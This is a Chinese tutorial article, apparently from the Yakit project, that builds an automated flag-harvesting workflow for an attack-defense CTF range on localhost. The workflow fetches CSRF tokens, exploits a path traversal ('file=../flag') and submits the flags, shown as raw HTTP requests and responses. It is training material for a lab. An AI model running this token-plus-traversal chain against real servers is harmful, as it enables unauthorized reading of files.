AWD:WebFuzzer 序列快速构建脚本
2023-9-21 12:37:2 Author: mp.weixin.qq.com(查看原文) 阅读量:6 收藏

前言

新发布的Web Fuzzer 序列 (Web Fuzzer Sequence),使用 Fuzzer 序列可以轻松构建一整个测试工作流。现在我们将综合利用 Yakit 现有的功能串联起 CSRF token 获取,flag 获取到提交 flag 这几个工作,最终快速构建起一个一键收割 flag 的 AWD 脚本。

在开始之前,先介绍一下测试环境。这是一个AWD靶场,平台在 127.0.0.1:8080,上面有目前三台靶机分别在127.0.0.1:8001 - 127.0.0.1:8083。他们都有一个目录穿越,但是有csrf token保护。

这篇文章将使用 Yakit 的能力快速构建一个攻击脚本。

Fuzzer Tag 请求多个靶机

这里先整理好所有的靶机地址,并使用fuzztag按照行读取到host变量,host变量会被继承到后面的所有请求,因此只需要设置一次这个变量。

现在我们使用这个变量,向所有靶机同时发送请求,获取csrf token。

GET / HTTP/1.1Content-Type: application/jsonHost: {{p(host)}}

提取 CSRF Token

    <form action="/" method="post">        <input name="file">        <input hidden name="csrf" value="26e65b25-0bee-49d1-a8c2-13678a9e58f8">        <button type="submit">Submit</button>    </form>

可以使用正则表达式数据提取器从 form 中提取 csrf token。

这里添加一个正则类型的数据提取器,我们要的csrf token明显是一个uuid,这里写一个uuid的正则来来提取这一块内容。

提取结果:

获取 Flag 并提交

为了把csrf token传递到下一个请求中,先新建一个名为flag的请求,再在 fuzzer 序列的面板中设置变量向下传递。

此时,就可以在名为flag的请求中使用csrf这个变量了,现在我们构建请求:

POST / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: {{p(host)}}
csrf={{p(csrf)}}&file=../flag

在这个请求中,使用fuzzer tag嵌入从上面获取的CSRF变量,打一个简单的目录穿越获取flag:

HTTP/1.1 200 OKAccept-Ranges: bytesContent-Type: text/plain; charset=utf-8Last-Modified: Thu, 07 Sep 2023 06:38:32 GMTDate: Thu, 07 Sep 2023 07:57:13 GMTContent-Length: 42
flag{c369b72b-c776-4771-8d7c-a56bc7bb1e07}

body就是flag的内容,不过严谨起见,可以写一个flag的正则来提取flag。

下面构建第三个包,提交flag

大多数 AWD 平台都会提供使用 curl 提交 flag 的命令,可以使用yakit的curl转数据包功能快速构建出提交flag的数据包。

POST /pushflag HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: localhost:8080Content-Length: 18
flag=flag{example}

略作修改,使用变量替换示例flag:

POST /pushflag HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: localhost:8080
flag={{p(flag)}}

顺利提交flag:

HTTP/1.1 200 OKContent-Type: text/plain; charset=utf-8Date: Thu, 07 Sep 2023 08:03:21 GMTContent-Length: 7

success
有什么优势吗?
  • 全程使用 GUI 操作,多数简单的测试,不用写一行代码
  • 可以配合 MITM 抓包使用,复杂包体不用自己构造,直接从 MITM 导入并修改变动部分即可
  • 支持使用 FuzzTag 嵌套的方式进行编解码,也可以使用热加载 Yaklang 进行任意复杂操作
为了方便师傅们使用,文章演示环境已上传Github,有需要的师傅们请获取链接自行下载~
https://github.com/BaiMeow/TryYakitFuzzerSeri

END
Yak官方资源
Yak 语言官方教程:
https://yaklang.com/docs/intro/
Yakit 视频教程:
https://space.bilibili.com/437503777
Github下载地址:
https://github.com/yaklang/yakit
Yakit官网下载地址:
https://yaklang.com/
Yakit安装文档:
https://yaklang.com/products/download_and_install
Yakit使用文档:
https://yaklang.com/products/intro/
常见问题速查:
https://yaklang.com/products/FAQ
长按识别添加工作人员
开启Yakit进阶之旅

                    


                    

                        文章来源: https://mp.weixin.qq.com/s?__biz=Mzk0MTM4NzIxMQ==&mid=2247511891&idx=1&sn=8875a1caec4a65d66b7978cb8f90d5a0&chksm=c2d1d3f7f5a65ae1c5e6dd0570e72a5cf061272aa873e0468523405e9a9ebce4fe13536dacad&scene=58&subscene=0#rd
 如有侵权请联系:admin#unsafe.sh